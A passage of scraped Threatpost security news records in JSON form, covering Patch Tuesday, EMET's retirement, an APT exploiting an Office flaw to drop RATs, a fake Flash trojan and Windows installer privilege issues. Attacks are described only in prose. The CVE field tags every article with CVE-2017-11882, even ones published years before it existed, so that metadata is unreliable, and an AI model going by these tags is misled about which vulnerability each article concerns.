patches](<http://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>), making them available only to premier support customers. Perhaps, security will stop being a marketing differentiator for Microsoft.\n\n\u201cThey\u2019re not going to get rid of security, but like Apple, put it more behind the scenes,\u201d said Marc Maiffret, a longtime Windows bug-hunter and current CTO at BeyondTrust. \u201cIt\u2019s not going to be the thing they talk about most. It distracts from them being a software and technology company.\u201d\n\nMicrosoft\u2019s QA testing of patches is extensive and reportedly separate from the Microsoft Security Resource Center (MSRC) and TWC, which focuses on security research, threat modeling and risk management. Updates are tested against a variety of application and operating system environments for compatibility issues and must meet strict deadlines to be included in a timely fashion to Windows Update. Patches are also tested against third party applications, and Microsoft will insist that patch quality issues have little to do with TWC changes and more to do with advanced and changing threats.\n\n\u201cMicrosoft carefully reviews and tests each security update to ensure its quality and that it has been thoroughly evaluated for application compatibility. There are many factors that can impact the length of testing,\u201d said Chris Betz of the MSRC in a statement provided to Threatpost. \u201cOnce the update is built, it must be tested with the different operating systems and applications it affects, then localized for the different markets and languages around the world. In some instances, multiple vendors are affected by the same or similar issues, which requires a coordinated release.\u201d\n\nMicrosoft\u2019s focus on delivering a consistent schedule of patches helps users inside the enterprise and smaller organizations line up their deck chairs, do compatibility testing and control patch rollouts. These processes are finely tuned compared to a decade ago, and most organizations would not trade Patch Tuesday, say for automatic silent patching, a la Google\u2019s updates to Chrome, for example, experts said.\n\n\u201cThe bigger factor that surrounds things like Patch Tuesday is that threats have changed,\u201d Maiffret said. \u201cOrganizations like governments or anyone who is a high-value target, has a good chance of getting hit with a zero day, which Patch Tuesday has no bearing on, at least up front. That\u2019s a big part of it: security moving away from the value of one individual vulnerability.\u201d\n\n**Automatic Patching Has Its Place**\n\nMicrosoft, for its part, has not been stagnant with patching. New services such as [myBulletins](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>) and a revamped Exploitability Index help customers make deployment decisions, while its partner programs such as Microsoft Active Protections Program give participating enterprises and vendors a head\u2019s up on vulnerability details in order to coordinate patch delivery with interdependent products.\n\n\u201cEach customer is unique with varying needs based on their technology environments. With the evolution of cloud computing, more and more customers are taking advantage of the real time updates we provide,\u201d said Betz. \u201cCustomers are also increasingly taking advantage of Microsoft Update to automatically provide updates.\u201d\n\nAttackers, however, have the luxury of being able to focus on one bug, but defenders have to look at the biggest risks to their respective environments, hoping they make the right assessments and prioritizations. And this goes well beyond Microsoft to third-party applications such as Flash, Java and others that run everywhere and have been providing attackers with much more tempting targets of late. Yet with the world primarily still running on Windows, especially in smaller organizations, patch quality still gives people pause with regard to going to an automated process.\n\n\u201cI think people would like to be in automatic mode. There\u2019s a huge value to set-it-and-forget-it, but there\u2019s still a risk involved and it\u2019s difficult for people to consume that risk not knowing what could happen,\u201d said Andrew Storms, vice president of security services at New Context, and former security executive at CloudPassage and nCircle. \u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time; if I were a CIO, I would be drooling.\u201d\n\nThat, of course, depends on patches that are good to go out of the box, so to speak.\n\n\u201cAny business at the scale of Google or Microsoft have so many complexities that there are going to be unforeseen interactions,\u201d said Tripwire security researcher Craig Young. \u201cThat\u2019s why enterprises test patches in a controlled environment to make sure they don\u2019t breach critical business applications before rolling them out to systems. That works. The Chrome model is probably not appropriate if you\u2019re a hospital where all your terminals need a web app interface with insurance providers and if Microsoft updates IE and the web app no longer renders properly, how would you address that situation?\u201d\n\n**Environment to Dictate Patching Styles**\n\nKatie Moussouris, a former lead security strategist at Microsoft and current chief policy officer at HackerOne, was deeply involved in the development of Microsoft\u2019s coordinated disclosure program and developing strong relationships with vulnerability researchers and brokers. She says vendors need to sharpen patch development where quality and speed go hand in hand. This takes on more relevance with the so-called Internet of Things, where embedded computers often don\u2019t have simple patching mechanisms yet play critical roles in manufacturing, health care and personal environments.\n\n\u201cPatching style is something that definitely has to evolve as what makes up the bulk of internet traffic starts changing,\u201d Moussouris said. \u201cMobile devices are difficult to patch, and are not patched on anyone\u2019s schedule. Many are not designed to be patched either; they\u2019re designed to be upgraded or thrown away in two years.\u201d\n\nMicrosoft, meanwhile, has taken steps to [make exploitation more difficult for attackers](<http://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876>). The introduction of memory corruption mitigations such as ASLR and DEP into Windows and Internet Explorer have made buffer overflow vulnerabilities less of a hassle than a decade ago. Free tools such as the [Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) are often a stopgap for zero-day vulnerabilities until Microsoft can release a scheduled or out-of-band security bulletin.\n\n\u201cMicrosoft has focused on a higher level of mitigations, knowing how high to raise the bar to make exploitation really hard,\u201d Maiffret said. \u201cI hope they keep their eye on mitigations, not just EMET but also the underlying operating system.\u201d\n\nFor the time being, Microsoft won\u2019t retire Patch Tuesday and its high-paying enterprise customers likely won\u2019t let them. And in the end, Patch Tuesday is still relevant on many fronts, and the processes are still superior to many third-party patching processes.\n\n\u201cStepping back, you have to ask: \u2018What\u2019s the relevance of Microsoft vulnerabilities in attacks and exploits?'\u201d Maiffret said. \u201cMicrosoft software is still relevant and part of targeted attacks; you still see IE targeted attacks happening, but at the same time, you\u2019re seeing an increase of third-party apps in targeted attacks. That\u2019s the biggest shift. Microsoft is slightly putting security in the back seat, not doing less internally, but in visibility. That mirrors what\u2019s happening from the attackers\u2019 perspective; it\u2019s just as important to find a Flash or Java vulnerability versus a Microsoft vulnerability.\u201d\n", "cvss3": {}, "published": "2015-02-10T09:00:49", "type": "threatpost", "title": "Creaking Patch Tuesday's Viability Rests with Quality, Speed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-11T12:02:27", "id": "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "href": "https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. It was never supposed to be something [Microsoft] wanted people to use longterm,\u201d said Cody Pierce, director of vulnerability research at Endgame. \u201cThey want people to upgrade Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. [Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is thought to be a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), which became a favorite exploit once ASLR and DEP put a damper in buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. Also, EMET required close care when configuring it to work, otherwise it could break certain application processes.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which makes the most of hardware virtualization to sandbox applications and links before they can harm the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce illustrated how advanced attackers have blown well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>) with advanced logic that automates many facets of an attack that its defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": {}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-10-20T13:38:19", "description": "An APT described as a \u201clone wolf\u201d is exploiting a decades-old Microsoft Office flaw to deliver a barrage of commodity RATs to organizations in India and Afghanistan, researchers have found.\n\nAttackers use political and government-themed malicious domains as lures in the campaign, which targets mobile devices with out-of-the-box RATs such as dcRAT and [QuasarRAT](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) for Windows and AndroidRAT. They\u2019re delivering the RATs in malicious documents by exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11882>), according to a [report published Tuesday](<https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) by Cisco Talos. \n\nThe threat group \u2013 tracked by Cisco Talos from the beginning of the year through the summer \u2013 disguises itself behind a front that seems legitimate, posing as a Pakistani IT firm called Bunse Technologies, researchers said.\n\nCVE-2017-11882 is a more than 20-year-old memory corruption vulnerability in Microsoft Office that persisted for 17 years before the company [patched it](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017. However, as recently [as two years ago](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>), attackers were seen exploiting the bug, which allows them to run malicious code automatically without requiring user interaction.\n\nThe advanced persistent threat (APT) behind the campaign also uses a custom file enumerator and infector in the reconnaissance phase of the two-step attack, followed by a second phase added in later versions of the campaign that deploys the ultimate RAT payload, researchers said.\n\nTo host the malware payloads, the threat actor registered multiple domains with political and government themes used to fool victims, particularly ones linked to diplomatic and humanitarian efforts in Afghanistan to target entities in that country, researchers said.\n\n\u201cThis campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims\u201d \u2013 in this case, RATs \u201cpacked with multiple functionalities to achieve complete control over the victim\u2019s endpoint,\u201d Cisco Talos\u2019 Asheer Malhotra wrote in the post. \n\n## **Out-of-the-Box Benefits**\n\nThe campaign reflects an increased trend by both cybercriminals and APTs to use commodity RATs instead of custom malware against victims for a number of reasons, researchers said.\n\nUsing commodity RATs gives attackers a range of out-of-the-box functionality, including preliminary reconnaissance capabilities, arbitrary command execution and data exfiltration, researchers noted. The RATs also \u201cact as excellent launch pads for deploying additional malware against their victims,\u201d Malhotra wrote.\n\nUsing commodity malware also saves attackers both the time and resource investment in developing custom malware, as the RATs have stock features requiring minimal configuration changes, researchers said.\n\nIn their post, researchers broke down the two-stage attack process as well as the specifics of each RAT they observed attackers using in the campaign. RAT functionality varies depending on the payload, they said, but generally includes capabilities such as remote shells, process management, file management, keylogging, arbitrary command execution and credential stealing.\n\n## **Initial Infection and Reconnaissance**\n\nThe infection chain consists of a reconnaissance phase that starts with malicious RTF documents and PowerShell scripts that ultimately distribute malware to victims. \n\nSpecifically, the threat actor uses the RTF to exploit the Office bug and execute a malicious PowerShell command that extracts and executes the next-stage PowerShell script. That script then base64 decodes another payload \u2013 in the case researchers observed, it was a loader executable \u2013 and activates it on the infected endpoint, Malhotra wrote.\n\nThe loader executable begins by establishing persistence for itself using a shortcut in the current user\u2019s Startup directory and then compiles hardcoded C# code into an executable assembly. It then invokes the entry point for the compiled malicious code \u2013 the previously mentioned custom file enumerator and infector \u2013 researchers found.\n\nThis C# code \u2013 which is the final payload in the reconnaissance phase \u2013 contains the file enumerator, which lists specific file types on the endpoint and sends the file paths to the command-and-control (C2) server along with file infector modules, which are different than typical executable infectors usually seen in the wild, Malhotra noted.\n\n\u201cThese modules are used for infecting benign Office documents with malicious OLE objects to weaponize them to exploit CVE-2017-11882,\u201d he wrote.\n\n## **Attack Phase**\n\nResearchers observed attackers switching up tactics to deploy commodity RATs as the final payload starting in July, they said. \n\nTo do this, attackers tweaked the reconnaissance process slightly to leverage the second-stage PowerShell script to create a BAT file on disk, researchers said. That file, in turn, would execute another PowerShell command to download and activate the RAT payload on the infected endpoint, retrieving it from one of the sites attackers set up. \n\u201cSo far, we\u2019ve observed the delivery of three types of payloads from the remote locations discovered in this phase of the campaign: DcRAT, QuasarRAT and a legitimate copy of the remote desktop client AnyDesk,\u201d Malhotra wrote.\n\nThe use of the last payload \u201cindicates a focus on manual operations where the actor would have logged into the infected devices to discern if the access was of any value,\u201d according to the writeup.\n\nAll in all, the tactics of the APT used in the campaign demonstrate \u201caggressive proliferation\u201d as the goal, as the use of out-of-the-box malware combined with customized file infections gives them a straightforward point of entry onto a victim\u2019s network, Malhotra observed.\n\n\u201cOrganizations should remain vigilant against such threats that are highly motivated to proliferate using automated mechanisms,\u201d he wrote.\n\nHowever, it seems likely that the group will eventually abandon its use of commodity malware for its own bespoke tools, which means there will probably be more threat campaigns in its future, researchers said.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-20T13:28:13", "type": "threatpost", "title": "\u2018Lone Wolf\u2019 APT Uses Commodity RATs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-10-20T13:28:13", "id": "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "href": "https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:02:32", "description": "Microsoft gave its users steps earlier this week to sidestep a vulnerability in one of Oracle\u2019s Outside In libraries. The company published some mitigations for the bug, but said it isn\u2019t aware of any active attacks against it yet.\n\nThe Oracle technology is licensed by software developers like Microsoft to transform and control different types of file formats. Outside In is present in Microsoft\u2019s Exchange Server 2007, Exchange Server 2010 and FAST Search Server for Sharepoint products. The vulnerability was initially highlighted in [Oracle\u2019s Critical Patch Update Advisory for this month](<http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html>).\n\nIn a [post on its Technet blog](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>), Dave Forstrom of the Trustworthy Computing claimed Microsoft isn\u2019t aware of any active exploits against the vulnerability but insisted following the workaround would be the best practice for users until an adequate security update was developed.\n\n[A separate blog post](<http://blogs.technet.com/b/srd/archive/2012/07/24/more-information-on-security-advisory-2737111.aspx>) by Microsoft\u2019s Security and Defense team explains the best way to minimize risk is disabling WebReady Document Viewing on the VDir of all CAS servers. This will circumvent a problem that lies in the way WebReady Document Viewing renders certain attachments as a web page \u201cinstead of relying on local applications to open/view it,\u201d according to the post.\n\nFor more on this, including a more in depth explanation of the Oracle flaw, head to [Technet](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>).\n", "cvss3": {}, "published": "2012-07-26T16:34:25", "type": "threatpost", "title": "Microsoft Publishes Workaround for Oracle Outside In Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:105BBC66E564BD98581E52653F5EA865", "href": "https://threatpost.com/microsoft-publishes-workaround-oracle-outside-vulnerability-072612/76854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "If there\u2019s one key message coming through all of the noise at the RSA Conference this week it\u2019s the fact that there\u2019s a pressing need for more data. Data on attacks, data on vulnerabilities, data on data breaches, data on software security, data on everything having to do with security. The mini-movement that has sprung up around metrics and measurement in security has taken over a lot of the conversation at the conference, with some interesting results.\n\nSeveral different panels and talks have addressed the metrics problem from a variety of angles, with the consensus being that there just simply isn\u2019t enough good data available in most parts of the industry. The last few years have seen a marked increase in the amount of data avilable on some topics, especially data breaches, but those are still the exceptions rather than the rule. In a panel Wednesday morning, four experts with disparate backgrounds said that a big part of the problem is that it\u2019s not clear what should be measured or how.\n\nEven Microsoft, which has been looking at this problem for several years, doesn\u2019t have a clear answer. Adam Shostack, a security program manager at Microsoft, said the company has good systems in place for measuring vulnerability counts and patch counts, but is still working on how to get the most out of those numbers.\n\n\u201cThe one thing we know is that our customer would like fewer updates and more secure software,\u201d he said during the panel discussion, which also included Gary McGraw of Cigital, Matt Blaze of the University of Pennsylvania and Elizabeth Nichols of PlexLogic. \u201cThat\u2019s the primary metric that we work off of.\u201d\n\nMcGraw, who has been working on measuring software security and internal software security programs for several years, said that even the organizations doing the best job with those programs have a tough time getting the most out of their measurement efforts. But the key thing is, at least they\u2019re doing the measurements. The vast majority of software makers and other companies that produce their own custom applications aren\u2019t even taking that step.\n\n\u201cA lot of people are selling highly flammable software. There\u2019s no one who isn\u2019t because people don\u2019t know how to build secure software,\u201d Blaze said.\n", "cvss3": {}, "published": "2009-04-22T19:52:40", "type": "threatpost", "title": "Experts call for better measurement of security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:21439BDD06D57894E0142A06D59463B5", "href": "https://threatpost.com/experts-call-better-measurement-security-042209/72562/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:UsersusernameAppDataLocalTemp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp `(where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: [digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yanex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. Jose said by highlighting the text, you\u2019re able to read it to the end and notice a condition that states the user\u2019s home back will be changed\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains were for the new start pages, as well as the domains hosting the malicious Flash update were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also change to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:45", "description": "[![Windows patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065215/windows_patch_0_1.jpg)](<https://threatpost.com/microsoft-fixes-critical-ie-windows-bugs-february-patch-tuesday-021412/>)Microsoft released nine security updates Tuesday, four critical; five important, fixing 21 different holes in various applications with its February patch release. The four critical fixes deal with vulnerabilities in the company\u2019s Windows, Internet Explorer, .NET Framework and Silverlight programs that could allow remote code execution if left unpatched.\n\nMicrosoft considers MS12-010 and MS120-013 as the update\u2019s top priority bulletins.\n\nMS12-010 addresses four issues in Internet Explorer, two critical, one important and one moderate. The two critical issues could allow an attacker the same rights as a logged-on user while the other two could allow an attacker to view content remotely or via the browser\u2019s processed memory.\n\nIn MS12-010, if a user were to open a specially crafted media file in Windows, it could lead to a buffer overflow in the C++ Run-Time Library. Alexander Gavrun, working with TippingPoint\u2019s Zero Day Initiative, disclosed an issue with the vulnerability, yet Microsoft claims it isn\u2019t actively being exploited in the wild.\n\nSome of the other fixes involve a flaw (MS12-015) in the less-used Visio Viewer where an attacker could gain access if a specially crafted Visio file was opened. A vulnerability (MS12-014) in Indeo Codec could allow an attacker to run arbitrary code as the logged on user if an .AVI file was opened in the same directory as a .DLL file. Similarly, in Windows\u2019 Color Control Panel, if a user opened an .ICM or .ICC file in the same directory as a .DLL file, an attacker could gain control of their computer (MS12-012).\n\nTwo of the vulnerabilities marked \u2018Important\u2019 by Microsoft deal with flaws in Windows\u2019 Ancillary Function Driver (MS12-009) and Microsoft Office and Server\u2019s Sharepoint (MS12-011). Both of these vulnerabilities could allow elevation of privilege, according to the company, if an attacker ran a malicious application for MS12-009 or encountered an XSS vulnerability in Sharepoint (MS12-011).\n\nThe monthly update is Microsoft\u2019s last batch of updates before this year\u2019s Pwn2Own competition, an annual hacking contest held the first week of March at Vancouver\u2019s [CanSecWest Conference](<http://cansecwest.com/>). Each year entrants attempt to hack browsers like Microsoft\u2019s Internet Explorer and Mozilla\u2019s Firefox in the challenge run by TippingPoint.\n\nIt was around this time last year that [Stephen Fewer](<https://threatpost.com/pwn2own-winner-stephen-fewer-031011/>), now with Harmony Security, [bypassed Internet Explorer 8](<https://threatpost.com/apple-safari-and-internet-explorer-8-go-down-pwn2own-iphone-next-031011/>)\u2019s DEP and ASLR to execute a successful exploit in the browser on Windows 7.\n", "cvss3": {}, "published": "2012-02-14T20:17:07", "type": "threatpost", "title": "Microsoft Fixes Critical IE, Windows Bugs with February Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:48", "id": "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "href": 